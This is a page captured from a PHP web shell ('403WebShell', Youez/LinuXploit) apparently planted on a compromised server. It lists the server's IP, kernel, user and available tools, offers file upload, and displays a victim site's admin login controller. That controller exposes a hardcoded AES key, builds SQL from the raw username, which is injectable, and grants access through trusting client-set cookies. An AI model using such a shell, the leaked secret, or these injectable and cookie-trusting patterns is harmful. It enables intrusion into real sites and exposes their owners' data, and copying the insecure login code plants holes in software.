403WebShell

403Webshell

Server IP : 103.119.228.120 / Your IP : 18.191.200.47
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /home/hendraso/public_html/Modules/Controller/Admin/

Upload File :

[ Back ]

Current File : /home/hendraso/public_html/Modules/Controller/Admin/User.php

<?php
class Controller_Admin_User {
    function load_action($action) {
            session_start();
            echo json_encode($this->$action());
    }
    
    protected function do_cookie() {
        $err = '';
        if(!isset($_COOKIE['user']) && empty($_COOKIE['user'])){
            $err = 'Please login';
        }
        if(empty($err)) {
            return array('status' => 'ok');
        }else{
            return array('status' => 'error', 'session' => false, 'error' => $err);
        }
    }
	
    protected function do_login() {
        require '../Additional/aes.php';
        require '../Additional/aesctr.php';
		require '../Additional/passwordLib.php';
        $timer = microtime(true);
        $pw = '!@#$%#%$^&&^*(&*)*&terajanamahatmagandhi$#%$^&**&*(&(';
        $password = AesCtr::decrypt($_POST['password'], $pw, 256);
        $user = Xssfilter::filter($_POST['username']);
        $pass = Xssfilter::filter($password);

        $arrErr = array();
        if( empty($user)){
            $arrErr['user'] = "Username is required.";
        }else{
            $sql = "SELECT udafId, udafPassword, udafName, udafEmail, udafType, udafHash, udafIsAdmin, udafImage  FROM user WHERE udafEmail='" . trim($user) . "' and udafStatus='0'";
            $cekUser = Generaldb::instance()->dbgetone($sql);
            if(empty($cekUser['udafEmail'])) {
                $arrErr['user'] = "Username Not Available";
            }
            if(!empty($pass) && !empty($cekUser)){
                if (!password_verify(trim($pass.$cekUser['udafHash']), trim($cekUser['udafPassword']))) {
                    $arrErr['pass'] = "Please Check Your Password";
                }
            }
        }

        if(empty($pass)){
            $arrErr['pass'] = "Password is required.";
            if(empty($cekUser['udafEmail'])) {
                $arrErr['user'] = "Username Not Available";
            }
        }else{
            if(!empty($cekUser)) {
                if (!password_verify(trim($pass . $cekUser['udafHash']), trim($cekUser['udafPassword']))) {
                    $arrErr['pass'] = "Please Check Your Password";
                }
            }
        }

        if(empty($arrErr)) {
			$menuTreeUser = GeneralFunction::build()->getMenuUser($cekUser['udafId'], true);
            $menuUser = json_decode($menuTreeUser, true);
            if(!isset($menuUser['status'])) {
				setcookie('user', trim($user), time() + (604800 * 30), "/");
				setcookie('userId', $cekUser['udafId'], time() + (604800 * 30), "/");
				setcookie('userRealname', $cekUser['udafName'], time() + (604800 * 30), "/");
				setcookie('userType', $cekUser['udafType'], time() + (604800 * 30), "/");
				setcookie('userIsA', $cekUser['udafIsAdmin'], time() + (604800 * 30), "/");
				setcookie('userImage', empty($cekUser['udafImage']) ? Config::load()->path() . "/Assets/img/default.png" : Config::load()->path() . "/Assets/img/" . $cekUser['udafImage'], time() + (604800 * 30), "/");
				//setcookie('menuAdmin', GeneralFunction::build()->getMenuUser($cekUser['udafId'], true), time() + (604800 * 30), "/");	
			
                /* Page URL after Login */
                //$rsAfterLogin = Generaldb::instance()->dbgetone("SELECT menuLink FROM user_access LEFT JOIN menu ON (udacAccess = menuId) WHERE udacUdafId = '".$cekUser['udafId']."' AND menuChild != 0 LIMIT 1");
                $rsAfterLogin = Generaldb::instance()->dbgetone("SELECT menuLink FROM user_access LEFT JOIN menu ON (udacAccess = menuId) WHERE udacUdafId = '".$cekUser['udafId']."' AND menuLink IS NOT NULL AND menuLink != '' LIMIT 1");
                $afterLogin = $rsAfterLogin['menuLink'];
                /* ==================== */

                //$success =  array('status' => 'ok', 'session' => true, 'url' => $afterLogin, 'a' => $cekUser['udafIsAdmin']);
				$success =  array('status' => 'ok', 'session' => true, 'url' => $afterLogin, 'a' => $cekUser['udafIsAdmin'], 'menuAccess' => $menuTreeUser);
            }else{
                $arrErr['progress'] = "Your Account being processed!";
                //return array('status' => 'error', 'session' => false, 'error' => 'Your Account being processed!');
            }
            if(!empty($arrErr)) {
                return array('status' => 'error', 'session' => false, 'error' => $arrErr);
            }else{
                return $success;
            }
        }else{
            return array('status' => 'error', 'session' => false, 'error' => $arrErr);
        }

	}
	
	protected function do_addproductlist() {
		setcookie('userProductList', $_POST['id'], time() + (604800 * 30), "/");
		return array('status' => 'ok');
	}
    
    protected function do_logout() {
        unset($_COOKIE['user']);
        unset($_COOKIE['userId']);
        unset($_COOKIE['userRealname']);
		unset($_COOKIE['userProductList']);
		unset($_COOKIE['userType']);
		unset($_COOKIE['userIsA']);
		//unset($_COOKIE['menuAdmin']);
		unset($_COOKIE['userImage']);
		
		setcookie('user', null, -1, '/');
		setcookie('userId', null, -1, '/');
		setcookie('userRealname', null, -1, '/');
		setcookie('userProductList', null, -1, '/');
		setcookie('userType', null, -1, '/');
		setcookie('userIsA', null, -1, '/');
		//setcookie('menuAdmin', null, -1, '/');
		setcookie('userImage', null, -1, '/');
		header("location:" . Config::load()->path());
        //return array('status' => 'ok', 'session' => false);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit